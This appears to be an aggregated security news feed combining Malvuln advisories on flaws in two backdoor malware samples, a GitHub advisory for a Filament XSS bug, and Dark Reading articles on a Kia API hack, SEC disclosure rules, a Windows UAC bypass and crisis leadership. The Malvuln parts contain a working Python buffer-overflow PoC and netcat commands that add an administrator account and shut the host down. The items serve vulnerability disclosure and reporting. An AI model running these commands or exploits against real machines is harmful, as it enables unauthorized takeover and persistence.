Backdoor.Win32.Agent.pw malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/68dd7df213674e096d6ee255a7b90088.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Agent.pw  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 21111. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz triggering a stack buffer overflow overwriting the ECX, EDI registers and Structured Exception Handler (SEH). Sending a packet containing the ascii character "A" or "41", registers are overwritten with "3431" as 4 is 34 hex and 1 is 31 hex. The lowercase character "R" consistently triggers an access violation with registers being overwritten with "r" 72 hex.  
Family: Agent  
Type: PE32  
MD5: 68dd7df213674e096d6ee255a7b90088  
SHA256: 2ba1d27325224407b6d57e0e8d141e3f301225d18a68bb5380c46287a0fc4441  
Vuln ID: MVID-2024-0697  
Dropped files:   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1f90.1888): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=72727272 edx=040b1a3c esi=00000000 edi=00000002  
eip=76fced3c esp=0019de98 ebp=0019ded8 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:000> .ecxr  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

FAULTING_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

EXCEPTION_RECORD:  0019e09c -- (.exr 0x19e09c)  
ExceptionAddress: 00411515 (Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x00011515)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 72727276  
Attempt to write to address 72727276

PROCESS_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0019e0ec -- (.cxr 0x19e0ec)  
eax=025806f0 ebx=00000150 ecx=72727272 edx=040b1a3c esi=00000000 edi=72727272  
eip=00411515 esp=0019e54c ebp=0019e56c iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515:  
00411515 897904          mov     dword ptr [ecx+4],edi ds:002b:72727276=????????  
Resetting default scope

WRITE_ADDRESS:  72727276 

FOLLOWUP_IP:   
Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515  
00411515 897904          mov     dword ptr [ecx+4],edi

FAULTING_THREAD:  00001888

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272

LAST_CONTROL_TRANSFER:  from 0040c987 to 00411515

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
0019e56c 0040c987 025805a8 0000003f 0019e5bc Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0x11515  
0019e768 72727272 72727272 72727272 72727272 Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+0xc987  
0019e76c 72727272 72727272 72727272 72727272 0x72727272  
0019e770 72727272 72727272 72727272 72727272 0x72727272  
0019e774 72727272 72727272 72727272 72727272 0x72727272  
0019e778 72727272 72727272 72727272 72727272 0x72727272  
0019e77c 72727272 72727272 72727272 72727272 0x72727272  
0019e780 72727272 72727272 72727272 72727272 0x72727272  
0019e784 72727272 72727272 72727272 72727272 0x72727272  
0019e788 72727272 72727272 72727272 72727272 0x72727272  
0019e78c 72727272 72727272 72727272 72727272 0x72727272  
0019e790 72727272 72727272 72727272 72727272 0x72727272  
0019e794 72727272 72727272 72727272 72727272 0x72727272  
0019e798 72727272 72727272 72727272 72727272 0x72727272  
0019e79c 72727272 72727272 72727272 72727272 0x72727272  
0019e7a0 72727272 72727272 72727272 72727272 0x72727272  
0019e7a4 72727272 72727272 72727272 72727272 0x72727272  
0019e7a8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ac 72727272 72727272 72727272 72727272 0x72727272  
0019e7b0 72727272 72727272 72727272 72727272 0x72727272  
0019e7b4 72727272 72727272 72727272 72727272 0x72727272  
0019e7b8 72727272 72727272 72727272 72727272 0x72727272  
0019e7bc 72727272 72727272 72727272 72727272 0x72727272  
0019e7c0 72727272 72727272 72727272 72727272 0x72727272  
0019e7c4 72727272 72727272 72727272 72727272 0x72727272  
0019e7c8 72727272 72727272 72727272 72727272 0x72727272  
0019e7cc 72727272 72727272 72727272 72727272 0x72727272  
0019e7d0 72727272 72727272 72727272 72727272 0x72727272  
0019e7d4 72727272 72727272 72727272 72727272 0x72727272  
0019e7d8 72727272 72727272 72727272 72727272 0x72727272  
0019e7dc 72727272 72727272 72727272 72727272 0x72727272  
0019e7e0 72727272 72727272 72727272 72727272 0x72727272  
0019e7e4 72727272 72727272 72727272 72727272 0x72727272  
0019e7e8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ec 72727272 72727272 72727272 72727272 0x72727272  
0019e7f0 72727272 72727272 72727272 72727272 0x72727272  
0019e7f4 72727272 72727272 72727272 72727272 0x72727272  
0019e7f8 72727272 72727272 72727272 72727272 0x72727272  
0019e7fc 72727272 72727272 72727272 72727272 0x72727272  
0019e800 72727272 72727272 72727272 72727272 0x72727272  
0019e804 72727272 72727272 72727272 72727272 0x72727272  
0019e808 72727272 72727272 72727272 72727272 0x72727272  
0019e80c 72727272 72727272 72727272 72727272 0x72727272  
0019e810 72727272 72727272 72727272 72727272 0x72727272  
0019e814 72727272 72727272 72727272 72727272 0x72727272  
0019e818 72727272 72727272 72727272 72727272 0x72727272  
0019e81c 72727272 72727272 72727272 72727272 0x72727272  
0019e820 72727272 72727272 72727272 72727272 0x72727272  
0019e824 72727272 72727272 72727272 72727272 0x72727272  
0019e828 72727272 72727272 72727272 72727272 0x72727272  
0019e82c 72727272 72727272 72727272 72727272 0x72727272  
0019e830 72727272 72727272 72727272 72727272 0x72727272  
0019e834 72727272 72727272 72727272 72727272 0x72727272  
0019e838 72727272 72727272 72727272 72727272 0x72727272  
0019e83c 72727272 72727272 72727272 72727272 0x72727272  
0019e840 72727272 72727272 72727272 72727272 0x72727272  
0019e844 72727272 72727272 72727272 72727272 0x72727272  
0019e848 72727272 72727272 72727272 72727272 0x72727272  
0019e84c 72727272 72727272 72727272 72727272 0x72727272  
0019e850 72727272 72727272 72727272 72727272 0x72727272  
0019e854 72727272 72727272 72727272 72727272 0x72727272  
0019e858 72727272 72727272 72727272 72727272 0x72727272  
0019e85c 72727272 72727272 72727272 72727272 0x72727272  
0019e860 72727272 72727272 72727272 72727272 0x72727272  
0019e864 72727272 72727272 72727272 72727272 0x72727272  
0019e868 72727272 72727272 72727272 72727272 0x72727272  
0019e86c 72727272 72727272 72727272 72727272 0x72727272  
0019e870 72727272 72727272 72727272 72727272 0x72727272  
0019e874 72727272 72727272 72727272 72727272 0x72727272  
0019e878 72727272 72727272 72727272 72727272 0x72727272  
0019e87c 72727272 72727272 72727272 72727272 0x72727272  
0019e97c 76fa665c 0019ea68 001a1758 000007a0 0x72727272  
0019e9e0 76fa01a3 b8e17520 04394df0 04390000 ntdll!RtlpFindUnicodeStringInSection+0x19c  
0019ea14 00000000 00000003 00000000 0000003b ntdll!RtlpFreeHeap+0x723

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088

IMAGE_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  4228698c

STACK_COMMAND:  .cxr 0x19e0ec ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272_c0000409_Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272_MISSING_GSFRAME_Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

Followup: MachineOwner  
---------

0:000> !exchain  
0019df50: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
0019e8f8: 72727272  
Invalid exception stack at 72727272

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=21111  

def doit():  
    print("[+] Backdoor.Win32.Agent.pw")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 68dd7df213674e096d6ee255a7b90088")

    for i in range(1, 16):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="r"*512 * i   
        s.send(PAYLOAD.encode())  
        time.sleep(0.3)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    doit()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.pw MVID-2024-0697 Buffer Overflow

Backdoor.Win32.Boiling malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/80cb490e5d3c4205434850eff6ef5f8f.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.BoilingVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 4369. Third party adversaries who can reach an infected host, can issue single OS commands to takeover the system undermining the initial infection.Family: BoilingType: PE32MD5: 80cb490e5d3c4205434850eff6ef5f8fSHA256: cbaefa79eb48d893426d438b48ca0fc6e7f6f4a6810b9c1e76bf625b69a609e1Vuln ID: MVID-2024-0696Disclosure: 09/27/2024Exploit/PoC:nc64.exe x.x.x.x 4369calcOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net user hyp3rlinx 666 /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net localgroup administrators hyp3rlinx /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369ping 8.8.8.8 > out.txtOK, Success in Execute Commandúshutdown -fOK, Success in Execute CommandúDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Boiling MVID-2024-0696 Code Execution

### Summary

If values passed to a `ColorColumn` or `ColumnEntry` are not valid and contain a specific set of characters, applications are vulnerable to Cross-site Scripting (XSS) attack against a user who opens a page on which a color column or entry is rendered.

Versions of Filament from v3.0.0 through v3.2.114 are affected.

Please upgrade to Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115).

### PoC

> *PoC will be published in a few weeks, once developers have had a chance to upgrade their apps.*

### Response

This vulnerability (in `ColorColumn` only) was reported by @sv-LayZ, who reported the issue and patched the issue during the evening of 25/09/2024. Thank you Mattis.

The review process concluded on 27/09/2024, which revealed the issue was also present in `ColorEntry`. This was fixed the same day and Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115) followed.

> *An explanation of the fix will be published in a few weeks, once developers have had a chance to upgrade their apps.*

Although these components are no longer vulnerable to this type of XSS attack, it is good practice to validate colors, and since many Filament users may be accepting color input using the `ColorPicker` form component, [additional color validation documentation was published](https://filamentphp.com/docs/3.x/forms/fields/color-picker#color-picker-validation).

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-47186

**Filament has unvalidated ColorColumn and ColorEntry values that can be used for Cross-site Scripting**

Critical severity GitHub Reviewed Published Sep 27, 2024 in filamentphp/filament • Updated Sep 27, 2024

**Package**

composer filament/infolists (Composer)

**Affected versions**

\>= 3.0.0, < 3.2.115

**Summary**

If values passed to a ColorColumn or ColumnEntry are not valid and contain a specific set of characters, applications are vulnerable to Cross-site Scripting (XSS) attack against a user who opens a page on which a color column or entry is rendered.

Versions of Filament from v3.0.0 through v3.2.114 are affected.

Please upgrade to Filament v3.2.115.

**PoC**

> _PoC will be published in a few weeks, once developers have had a chance to upgrade their apps._

**Response**

This vulnerability (in ColorColumn only) was reported by @sv-LayZ, who reported the issue and patched the issue during the evening of 25/09/2024. Thank you Mattis.

The review process concluded on 27/09/2024, which revealed the issue was also present in ColorEntry. This was fixed the same day and Filament v3.2.115 followed.

> _An explanation of the fix will be published in a few weeks, once developers have had a chance to upgrade their apps._

Although these components are no longer vulnerable to this type of XSS attack, it is good practice to validate colors, and since many Filament users may be accepting color input using the ColorPicker form component, additional color validation documentation was published.

**References**

*   GHSA-9h9q-qhxg-89xr
*   filamentphp/filament@df79893
*   https://github.com/filamentphp/filament/releases/tag/v3.2.115

Published to the GitHub Advisory Database

Sep 27, 2024

Last updated

Sep 27, 2024

GHSA-9h9q-qhxg-89xr: Filament has unvalidated ColorColumn and ColorEntry values that can be used for Cross-site Scripting

The vulnerability is the latest discovered in connected vehicles in recent years, and it points out the cyber dangers lurking in automotive APIs.

Source: Jonathan WeissI via Shutterstock

Car buyers typically have many questions when purchasing a new automobile, but few are likely to consider whether an attacker could remotely control their vehicle using just license plate information.

Yet that's exactly what millions of Kia vehicles allowed until mid-August, when the automaker fixed a flaw that enabled such access, after independent security researchers alerted them to the issue.

**Remote Control of Kia Cars & SUVs**

The glitch is similar to those that the same group of researchers and others have discovered in recent years, and is sure to stoke already high concerns over the vulnerability of modern connected vehicles to cyberattacks.

In a Sept. 26 report, independent researcher Sam Curry said he discovered the Kia vulnerability when doing some follow-up research on multiple flaws he and colleagues discovered a couple of years ago in vehicles from Kia, Honda, Infiniti, Nissan, Acura, BMW, Mercedes, and others.  

At the time, the researchers showed how anyone could take advantage of the vulnerabilities to issue commands for remotely locking and unlocking vehicles, starting and shutting down the engine, and activating a vehicle's headlight and horn. Some of the flaws allowed an adversary to remotely take over an owner's account and lock them out of managing their own vehicle, while others enabled remote access to a vehicle's camera, with the ability to view live images from inside the vehicle. Some of the hacks required an adversary to have little more than a vehicle identification number, and sometimes even just an owner's email address.

**An Issue With Automotive API Protocols**

As with many of the previous flaws, the new issue that Curry and his fellow researchers discovered had to do with the application programming interface (API) protocols that enable Internet-to-vehicle commands on Kia automobiles.

The researchers found that it was relatively easy to register a Kia dealer account and authenticate it to the account. They could then use the generated access token to call APIs reserved for use by dealers, for things like vehicle and account lookup, owner enrollment, and several other functions.

After some poking around, the researchers found that they could use their access to the dealer APIs to enter a vehicle's license-plate information and retrieve data that essentially allowed them to control key vehicle functions. These included functions like turning the ignition on and off, remotely locking and unlocking vehicles, activating its headlights and horn, and determining its exact geolocation.

In addition, they were able to retrieve the owner's personally identifying information (PII) and quietly register themselves as the primary account holder. That meant they had control of functions normally available only the owner. The issues affected a range of Kia model years, from 2024 and 2025 all the way back to 2013. With the older vehicles, the researchers developed a proof-of-concept tool that showed how anyone could enter a Kia's vehicle license plate info and in a matter of 30 seconds execute remote commands on the vehicle.

"The recent discovery underscores the intricate challenges posed by the complex API protocols — such as gRPC, MQTT, and REST — used in connected cars," says Ivan Novikov, CEO of API security firm Wallarm. "Automakers must prioritize enhancing their cybersecurity measures by implementing stronger authentication methods and securing communication channels to protect against unauthorized access."

Akhil Mittal, senior manager of cybersecurity strategy and solutions at Synopsys Software Integrity Group, says the new discovery highlights how the biggest vulnerabilities in connected vehicles often have to do with systems that communicate with the outside world. He points to always-connected vehicle telematics systems as one example of such a component.

"Infotainment systems are another concern, as they connect to smartphones, apps, and other services, creating more entry points for hackers into the car's internal network," Mittal says. "The recent Kia hack really highlights how APIs and cloud services can be weak spots; if the APIs that control critical functions aren't secured properly, they become easy targets for attackers."

**A Troubling Pattern of Cars' Cyber Insecurity**

News of the Kia hack adds to growing concerns over connected vehicles — and not just about their security either. Earlier this year, two senior US lawmakers slammed General Motors, Honda, and Hyundai for collecting extensive data from connected vehicle about owners and their movement. The two lawmakers, Sens. Ron Wyden (D-Ore.) and Edward Markey (D-Mass.) called the data collection by the three automakers of a symptomatic industry-wide problem that highlighted the need for greater oversight and scrutiny of automaker practices.

"Automotive vendors have proven irresponsible at security again and again, and I wonder how much more we are going to see before action is taken," says David Brumley, CEO of software security firm ForAllSecure. "Yesterday the average driver worried about \[the theft of their\] key fob. Today, they have to worry about whether their dealer or manufacturer has an unprotected API. Where is the \[National Transportation Safety Board\] on this?"

Kia Motors did not respond immediately to a Dark Reading request for comment.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Millions of Kia Vehicles Open to Remote Hacks via License Plate

Companies that commit to risk management have a strong cybersecurity foundation that makes it easier to comply with the SEC's rules. Here is what you need to know about 8K and 10K filings.

Source: Louisa Svensson via Alamy Stock Photo

Question: How should security leaders navigate the SEC's cybersecurity and disclosure rules? What do they need to do in order to ensure compliance?

Michael Gray, CTO, Thrive: While the Securities and Exchange Commission's (SEC) Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure rules went into effect toward the end of 2023, many organizations still have questions when it comes to filings and disclosures. Under these rules, organizations have to disclose significant cybersecurity incidents and provide annual updates on their cybersecurity posture. Being able to accurately share cybersecurity updates, sometimes within short time frames, requires teams to have a deep understanding of 8-K and 10-K filings, and to implement new processes that simplify compliance.

**The Difference Between an 8-K and 10-K Filing**

8-K filings, in general, are periodic reports that public companies use to share information about major events that investors would likely want to know when making investment decisions. The SEC's cybersecurity rules now explicitly require that companies disclose material cybersecurity incidents via Item 1.05 of Form 8-K.

10-K filings, on the other hand, are detailed annual reports that summarize a public company's financial and operational performance over the past year. Part of a company's responsibility is to disclose the inner happenings of the business with stakeholders, and 10-K filings help to educate investors so that they can make informed decisions about their investments. Public companies must now include information about their cybersecurity strategy, governance, perceived threats, and material events that happened throughout the year within their yearly 10-K filings.

**The 8-K: Define Materiality**

A common question among cybersecurity teams today is how to determine whether a cybersecurity incident is "material" — incidents that have a significant impact on financial outcomes, as well as implications on the company's operations, reputation, compliance, and customer or stakeholder relations — and deserving of an 8-K filing. The SEC's guidance is that a cybersecurity incident is material if a rational investor would want to know about the event, such as incidents that result in substantial revenue losses, operational interruption or downtime, negative media coverage, legal risk, and customer data loss. For example, the Change Healthcare ransomware attack was material —patients' data was compromised, and it negatively affected hospitals, clinics, and healthcare professionals relying on the company. On the other hand, a phishing scheme targeted at an individual through a work email would not be considered material, as it most likely would not result in substantial revenue loss for the business or impact company stakeholders — especially if only personal information was given.

Companies must file an 8-K within four business days of identifying an incident, not within four business days of the incident occurring. If additional material information is identified that needs to be disclosed, companies would file an amendment to the original 8-K that disclosed the incident. In many cases, cybersecurity teams will uncover additional details about the incident that they can then share in subsequent reports to the SEC. Companies also have a duty to correct a prior disclosure that is found to be untrue as additional facts are determined.

**The 10-K: Disclosing Too Much and Too Little Information**

10-K filings are where cybersecurity teams share details on the current state of the company's cybersecurity program and strategy. The SEC's disclosure rules require that organizations identify who has oversight over cybersecurity activity and describe how they evaluate, discover, and mitigate material risks from cybersecurity threats. Item 106 of the 10-K is also where teams can revisit material incidents over the past year and provide additional commentary on the company's response and performance since the event. Item 106 also requires organizations to describe the board of directors' oversight of risks and management's role in assessing material risks. 10-K filings are not necessarily “new” in terms of information about an incident previously reported in an 8-K filing, but rather information about the resultant impact to the business and any identified cyber-risks the company faces that could result from a previous incident.

Again, the rule of thumb on how much information to disclose is that companies should give enough information for shareholders to be able to make sound investment decisions. A few details to consider include whether your company has a CISO, what cyber training programs are implemented for the board and employees at large, and if anyone on the board has detailed cybersecurity knowledge or expertise. More often than not, this means leaning into transparency rather than hiding critical details.

**Make Compliance Simpler**

Outside of 8-K and 10-K filings, employees should understand the company's overarching cybersecurity framework. This framework should cover how the organization approaches cybersecurity overall, document incident response procedures, and summarize how the enterprise improves over time.

Modern organizations have to be able to mitigate risk before and after cybersecurity incidents. Cybersecurity leaders should frequently audit their cybersecurity capabilities, as threats are evolving constantly. This involves identifying potential vulnerabilities and implementing effective risk management strategies, running real-time tests on your network and endpoints, and continuously communicating and training staff on cybersecurity policies. The SEC provides readiness assessments that can help in this area.

After an incident occurs, leaders should reflect on how well the organization responded and ensure key details are thoroughly documented within the 8-K. Companies should also engage with legal experts to review their compliance posture on a regular basis. Furthermore, employees need dedicated training on the SEC's cybersecurity disclosure rules, so that they are aware of the company's reporting obligations and understand their roles when it comes to incident response and annual readouts.

**About the Author**

Dark Reading

The Edge is Dark Reading's home for features, threat data and in-depth perspectives on cybersecurity.

How Should CISOs Navigate the SEC Cybersecurity and Disclosure Rules?

Adversaries can exploit CVE-2024-6769 to jump from regular to admin access without triggering UAC, but Microsoft says it's not really a vulnerability.

Source: Panther Media GmbH via Alamy Stock Photo

Researchers have flagged a weakness they're tracking as CVE-2024-6769, calling it a combination user access control (UAC) bypass/privilege escalation vulnerability in Windows. It could allow an authenticated attacker to obtain full system privileges, they warned.

That's according to Fortra, which assigned the issue a medium severity score of 6.7 out of 10 on the Common Vulnerability Scoring System (CVSS) scale. Its proof-of-concept exploit demonstrates that "you have the ability to shut down the system," stressed Tyler Reguly, associate director of security R&D at Fortra. "There are certain locations on the drive where you can write and delete files that you couldn't previously." That includes, for example, C:\\Windows, so an attacker could take ownership over files owned by SYSTEM.

For its part, Microsoft acknowledged the research but said it does not consider this an actual vulnerability, because it falls under its concept of acceptability to have "non-robust" security boundaries.

**Understanding Integrity Levels in Windows**

To understand Fortra's findings, we have to go back to Windows Vista, when Microsoft introduced the model of Mandatory Integrity Control (MIC). Simply put, MIC assigned every user, process, and resource a level of access, called an integrity level. Low integrity levels were afforded to all, medium for authenticated users, high for administrators, and system for only the most sensitive and powerful.

Alongside those integrity levels came UAC, a security mechanism that runs most processes and applications at the medium level by default, and requires explicit permission for any actions that require greater privileges than that. Typically, an admin-level user can upgrade simply by right-clicking a command prompt and selecting "Run as Administrator."

By combining two exploit techniques, Fortra researchers demonstrated in their proof of concept how an already-authorized user could slither through this system, jumping across the security boundary imposed on the medium integrity level to obtain full administrative privileges, all without triggering UAC.

**Using CVE-2024-6769 to Jump Across User Boundaries**

To exploit CVE-2024-6769, an attacker first must have a foothold in a targeted system. This requires the medium integrity-level privileges of an average user, and the account from which the attack is triggered must belong to the system's administrative group (the type of account that could level up to admin privileges, if not for UAC being in its way).

The first step in the attack involves remapping the targeted system's root drive — such as "C:" — to a location under their control. This will also shift the "system32" folder, which many services rely on to load critical system files.

One such service is the CTF Loader, ctfmon.exe, which runs without administrator privileges at a high integrity level. If the attacker places a specially crafted, copycat DLL in the copycat system32 folder, ctfmon.exe will load it and execute the attacker's code at that high integrity level.

Next, if the attacker wishes to obtain full administrative privileges, they can poison the activation context cache, which Windows uses to load specific versions of libraries. To do this, they craft an entry in the cache pointing to a malicious version of a legitimate system DLL, contained in an attacker-generated folder. Through a specially crafted message to the Client/Server Runtime Subsystem (CSRSS) server, the fake file is loaded by a process that has administrator privileges, granting the attacker full control over the system.

**Microsoft: Not a Vulnerability**

Despite the potential for privilege escalation, Microsoft refused to accept the issue as a vulnerability. After Fortra reported it, the company responded by pointing to the "non-boundaries" section of the Microsoft Security Servicing Criteria for Windows, which outlines how "some Windows components and configurations are explicitly not intended to provide a robust security boundary." Under the pertinent "Administrator to Kernel" section, it reads:

> Administrative processes and users are considered part of the Trusted Computing Base (TCB) for Windows and are therefore not strongly isolated from the kernel boundary. Administrators are in control of the security of a device and can disable security features, uninstall security updates, and perform other actions that make kernel isolation ineffective.

Essentially, Reguly explains, "They see the admin-to-system boundary as a nonexistent boundary, because admin is trusted on a host." In other words, Microsoft doesn't consider CVE-2024-6769 a vulnerability if an admin user could ultimately perform the same system-level actions anyway, subject to UAC approval.

In a statement to Dark Reading, a Microsoft spokesperson highlighted that "The method requires membership in the Administrator group, so the so-called technique is just leveraging an intended permission or privilege which does not cross a security boundary."

Reguly and Fortra disagree with Microsoft's perspective. "When UAC was introduced, I think we were all sold on the idea that UAC was this great new security feature, and Microsoft has a history of fixing bypasses for security features," he says. "So if they're saying that this is a trust boundary that is acceptable to traverse, really what they're saying to me is that UAC is not a security feature. It's some sort of helpful mechanism, but it's not actually security related. I think it's a really strong philosophical difference."

**Windows Shops Should Still Beware UAC Bypass Risk**

Philosophical differences aside, Reguly stresses that businesses need to be aware of the risk in allowing lower-integrity admins to escalate their privileges to attain full system controls.

At the end of a CVE-2024-6769 exploit, an attacker would have full reign to manipulate or delete critical system files, upload malware, establish persistence, disable security features, access potentially sensitive data, and more.

"Thankfully, only administrators are impacted by this, which means that most of your standard users are unaffected," Fortra noted in an FAQ to reporters. "For administrators, it is important to ensure that you are not running binaries whose origins cannot be verified. For those admins, however, vigilance is the best defense at the moment."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Novel Exploit Chain Enables Windows UAC Bypass

It is imperative for executives and board members to know who their top allies are, and how to best leverage them to successfully navigate a crisis and minimize the harm caused by a breach.

Chris Crummey, Director, Executive & Board Cyber Services, Sygnia

September 27, 2024

5 Min Read

Source: Artur Marciniec via Alamy Stock Photo

COMMENTARY

Many organizations have gone to great lengths in preparing for a cyberattack, leveraging both services and solutions to limit risk and exposure. Despite these efforts, breaches persist, ransomware payouts have grown, and leaders continue to make mistakes during cyber crises that impact organizations and customers both short and long term.

Most of these mistakes happen when the stakeholders do not know their roles, responsibilities, and what they are authorized to do in a crisis. This lack of clarity causes friction when leaders are required to make several highly impactful decisions during a cyber incident with little time and often limited verified information.

The biggest challenge facing crisis response teams is the fact there simply is never enough time to gather, verify, and analyze the necessary information to make the best possible decision. Under the pressure of a compressed timeline and increasingly concerned stakeholders, executives and board members tend to fixate on finding ways to shorten the time to remediation.

They should also prioritize reducing present and future risks for the company and ensure their teams do the same, but that often gets overlooked. As everyone within the organization turns to leadership for guidance and direction, it's important for those in charge to understand who their greatest allies are during a crisis and how they can leverage them to minimize the business and reputational impact of a breach.

**Open and Ongoing Communications**

During the crisis, leadership must rely on its guiding principles to define their communication strategy and provide employees with a North Star that explains what they need to do forthwith. This starts with establishing a secure and classified crisis war room to collaborate and communicate under privilege, categorizing the event and defining what can and cannot be shared, and clearly defining roles and responsibilities for each stakeholder. This creates a leadership filter that determines who is authorized to make decisions and sets a timeline in motion for when information should be disseminated internally and externally, which systems need to be taken offline or brought back on, and if or when authorities and regulators should be contacted. 

